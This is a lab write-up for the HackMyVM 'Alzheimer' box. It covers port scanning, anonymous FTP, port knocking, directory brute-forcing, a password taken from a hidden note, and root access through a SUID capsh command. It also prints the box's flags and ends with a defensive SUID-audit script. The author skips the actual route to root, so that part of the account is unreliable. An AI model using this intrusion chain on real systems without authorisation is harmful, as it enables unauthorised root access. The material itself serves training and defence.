Target machine link: https://hackmyvm.eu/machines/machine.php?vm=Alzheimer
Author: sml
Difficulty: dead box
Knowledge points: the knock command, SUID privilege escalation (capsh)
Port scan
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.11 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:23 CST
Nmap scan report for 192.168.9.11
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:93:BB:DC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.18 seconds
Ports 80 and 22 are restricted (filtered).
ftp 192.168.9.11
anonymous
There is a .secretnote.txt file inside.
View it:
cat .secretnote.txt
I need to knock this ports and
one door will be open!
1000
2000
3000
Ihavebeenalwayshere!!!
Interpretation
It means we need to knock these ports (1000, 2000, 3000) and then a service will open.
Knock the ports in order:
knock 192.168.9.11 1000 2000 3000 -v
Then rescan:
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.11 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:30 CST
Nmap scan report for 192.168.9.11
Host is up (0.00023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:93:BB:DC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Now 22 and 80 are both open.
Visit the website.
Nothing there.
Go straight to directory brute-forcing:
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.9.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.11/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home (Status: 301) [Size: 185] [--> http://192.168.9.11/home/]
/admin (Status: 301) [Size: 185] [--> http://192.168.9.11/admin/]
/secret (Status: 301) [Size: 185] [--> http://192.168.9.11/secret/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
I knocked for ages but the door would not open, and the directories could not be accessed. Later, reading a walkthrough, I found it was a network interface problem.
Here are the flags directly:
root@alzheimer:~# cat /root/root.txt
HMVlovememories
root@alzheimer:~# cat /home/medusa/user.txt
HMVrespectmemories
root@alzheimer:~#
Still, let's look at what the box is meant to test.
After a successful knock, visit the site's root directory.
Below it there should be Morse code:
OTHINGM
This should be medusa's password.
But it is wrong.
Continue looking at the site's other directories.
The admin directory is empty.
The file in the home directory hints that the password is in the Home directory, but not this home directory.
The secret directory hints that the password is in some directory under this secret directory.
So the password should be in the /secret/home directory.
The file in /secret/home gives a useless hint.
The root directory tells us the password was written into a .txt file.
So far, the only .txt file obtained is .secretnote.txt:
I need to knock this ports and
one door will be open!
1000
2000
3000
Ihavebeenalwayshere!!!
The Ihavebeenalwayshere!!! in it is medusa's password.
Although we have the flags, let's still look at the privilege escalation part.
After obtaining the medusa user's shell:
medusa@alzheimer:/root$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh
capsh --gid=0 --uid=0 --
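As an added defender-side example (not part of the original writeup), the following Python audits a `find / -perm -4000` listing like the one above against an allowlist of set-uid binaries expected on the image, and flags anything outside it; the baseline set and the sample listing are constructed here, and the allowlist is an assumption you would maintain per image, not a universal standard.

```python
"""Audit a SUID listing against a per-image baseline of expected set-uid binaries."""
import os
import stat

# Assumed baseline: set-uid binaries expected on this image. Anything else is flagged.
SUID_BASELINE = frozenset({
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/bin/chsh", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/newgrp",
    "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/umount",
    "/usr/bin/gpasswd",
})

# Constructed sample: the listing from the writeup, shell prompt included.
SAMPLE_LISTING = """\
medusa@alzheimer:/root$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh
"""

def parse_listing(text):
    """Return the absolute paths in a find(1) listing, skipping prompt and blank lines."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]

def unexpected_suid(paths, baseline=SUID_BASELINE):
    """Paths that are set-uid but not in the baseline, in listing order."""
    return [p for p in paths if p not in baseline]

def is_setuid_root(path):
    """Live check on the current host: owned by uid 0 and the set-uid bit is set."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)

def audit(text, baseline=SUID_BASELINE):
    """Parse a listing and return the unexpected set-uid paths."""
    return unexpected_suid(parse_listing(text), baseline)

if __name__ == "__main__":
    for p in audit(SAMPLE_LISTING):
        live = " (set-uid root on this host)" if is_setuid_root(p) else ""
        print(f"UNEXPECTED SUID: {p}{live}")
```

Note that `find -perm -4000` does not report binaries granted privileges through file capabilities, so pair this audit with `getcap -r / 2>/dev/null`.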